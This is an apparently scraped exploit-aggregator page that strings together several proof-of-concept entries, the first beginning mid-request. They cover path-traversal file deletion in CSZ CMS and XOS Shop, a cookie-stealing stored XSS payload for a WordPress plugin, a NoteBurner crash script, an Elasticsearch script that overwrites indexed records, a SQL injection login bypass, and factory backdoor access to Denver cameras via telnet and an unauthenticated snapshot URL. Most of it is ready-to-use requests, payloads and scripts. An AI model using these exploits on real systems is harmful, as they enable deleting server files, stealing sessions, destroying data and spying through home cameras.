------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="pagecache_time" 0 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="assets_static_domain" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="html_optimize_disable" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_file" ../../conf_secret_file.php ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLogo" 2021/1626800829_logo.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_og_image" ../../config_backup.txt ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="og_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ogImage" 2021/1626800829_og.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteEmail" demo@cszcms.com ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_protocal" mail ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_host" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_user" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_pass" 123456 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_port" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="sendmail_path" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_logs" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_sitekey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_secretkey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_client_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_view_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gsearch_cxid" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_key" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lat" -28.621975 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lng" 150.689082 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="fbapp_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="facebook_page_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="adobe_cc_apikey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_bg" #645862 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_fg" #ffffff ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_link" #f1d600 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_msg" This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_linkmsg" Privacy Policy and terms. ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_moreinfo" https://www.cszcms.com/LICENSE.md ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_txtalign" left ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_close" Got it! ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundary8cAl5KcKGP0D3Qi2-- --- # For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32 # The affected version is 1.2.9.
HireHackking
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS) # Date: 23/07/2021 # Exploit Author: Vikas Srivastava # Software Link: https://wordpress.org/plugins/simple-post/ # Version: 1.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate Simple Post 3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field. 4. Click Update Options. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>
HireHackking

NoteBurner 2.35 - Denial Of Service (DoS) (PoC)

HACKER · %s · %s

# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC) # Date: 25.07.2021 # Vendor Homepage:https://www.noteburner.com/ # Software Link: https://anonfiles.com/13h9Hb82ub/noteburner_exe # Exploit Author: Achilles # Tested Version: 2.35 # Tested on: Windows 7 x64 # 1.- Run python code : # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Noteburner # 4.- Click More and Enter License Code # 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code' # 6.- Click 'OK' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
HireHackking

Elasticsearch ECE 7.13.3 - Anonymous Database Dump

HACKER · %s · %s

# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 import os import argparse import sys ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description='Elasticdump 1.0\n') parser.add_argument('-s', "--host", action="store", dest='host', help="Host to attack.") parser.add_argument('-p', "--port", action="store", dest='port', help="Elastic search port by default 9200 or 9201") parser.add_argument('-i', "--index", action="store", dest='index', help="Index to dump (Example: 30)") args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args def banner(): print(" _ _ _ _") print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __") print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ") print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|") def exploit(host,port,index): if (index != 0): final = int(index) else: final = 1000000000 cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s") cont = cont + 1 if __name__ == "__main__": banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)
HireHackking
# Exploit Title: XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated) # Date: 2021-07-25 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://xos-shop.com # Software Link: https://github.com/XOS-Shop/xos_shop_system/releases/tag/v1.0.9 # Version: 1.0.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/XOS-Shop/xos_shop_system/issues/1 ################ # Description # ################ # XOS-Shop is a further development of the well-known open source webshop system "osCommerce". The XOS-Shop prior to version 1.0.9 suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php Vulnerable Code: line 66 - xos_shop_v1.0.9\shop\admin\manufacturers.php Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Manufacturers > edit any manufacturer 3. Upload any image as "Manufacturers Image" and click save button 4. Then, tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_manufacturer_image". # Assumed there is a backup.conf file in web root PoC #1) param current_manufacturer_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------120849309142309531191692203678 Content-Length: 1305 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/manufacturers.php?page=1&mID=10&action=edit Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[2]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[1]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_name[3]" App -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[2]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[1]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_url[3]" app.com -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="delete_manufacturer_image" true -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="current_manufacturer_image" ../../backup.conf -----------------------------120849309142309531191692203678 Content-Disposition: form-data; name="manufacturers_image"; filename="" Content-Type: application/octet-stream -----------------------------120849309142309531191692203678-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php Vulnerable Code: line 154-156, 167-169, 421-425, 433-437 - xos_shop_v1.0.9\shop\admin\categories.php Note: Multiple parameters affected Steps to Reproduce: 1. Login as admin 2. Goto Catalog > Categories/Products > edit any category 3. Upload any image as "Category Image" if there is no existing image and click save button else, 4. Tick "Delete" checkbox and click save button 5. Intercept the request and replace existing image name to any files on the server via parameter "current_category_image". # Assumed there is a backup.conf file in web root PoC #2) param current_category_image - Deleting backup.conf file in web root Request: ======== POST /xos_shop_v1.0.9/shop/admin/categories.php?action=update_category&cPath=&cpID=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------95672159210084798032704634599 Content-Length: 2524 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/xos_shop_v1.0.9/shop/admin/categories.php?cPath=&cpID=1&action=new_category Cookie: XOSsidAdmin=os13rkgs85m47iak7l8ck2j1ja Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_id" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_category_image" ../../../backup.conf -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="category_name" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="current_categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="delete_category_image" true -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_image"; filename="" Content-Type: application/octet-stream -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="product_list_b" 0 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="sort_order" 10 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_status" 1 -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[2]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[1]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_name[3]" Hardware -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_heading_title[3]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[2]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[1]" -----------------------------95672159210084798032704634599 Content-Disposition: form-data; name="categories_or_pages_content[3]" -----------------------------95672159210084798032704634599-- --- # For more explanation, you can refer to the github issue on XOS-Shop via https://github.com/XOS-Shop/xos_shop_system/issues/1 # The affected version is prior to v1.0.9.
HireHackking
# Exploit Title: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) # Date: 27 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-shc-150/c-1024/c-1243/p-3824 # Version: Denver SHC-150 (all firmware versions) # Tested on: Denver SHC-150 Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too. So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet. PoC: ``` enty8080@Ivans-Air ~ % telnet 192.168.2.118 23 Trying 192.168.2.118... Connected to pc192-168-2-118. Escape character is '^]'. goke login: default $ ls / bin home linuxrc opt run tmp dev init media proc sbin usr etc lib mnt root sys var $ pwd /home/default $ exit Connection closed by foreign host. enty8080@Ivans-Air ~ % ```
HireHackking
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass # Date: 27/07/2021 # Exploit Author: Shafique_Wasta # Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip # Version: 1 # Tested on: Windows 10/xampp # DESCRIPTION # # Customer relationship management system is vulnerable to Sql Injection Auth Bypass # Exploit Working: # 1. Visit on localhostcrm/customer/login.php # 2. You will see the login panel # 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account. # Vulnerable URL :http://localhost/crm/customer/login.php # Payload: '=' 'or'
HireHackking

Denver IP Camera SHO-110 - Unauthenticated Snapshot

HACKER · %s · %s

# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot # Date: 28 July 2021 # Exploit Author: Ivan Nikolsky (enty8080) # Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 # Version: Denver SHO-110 (all firmware versions) # Tested on: Denver SHO-110 Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too. So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication. It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream. PoC: http://<host>:8001/snapshot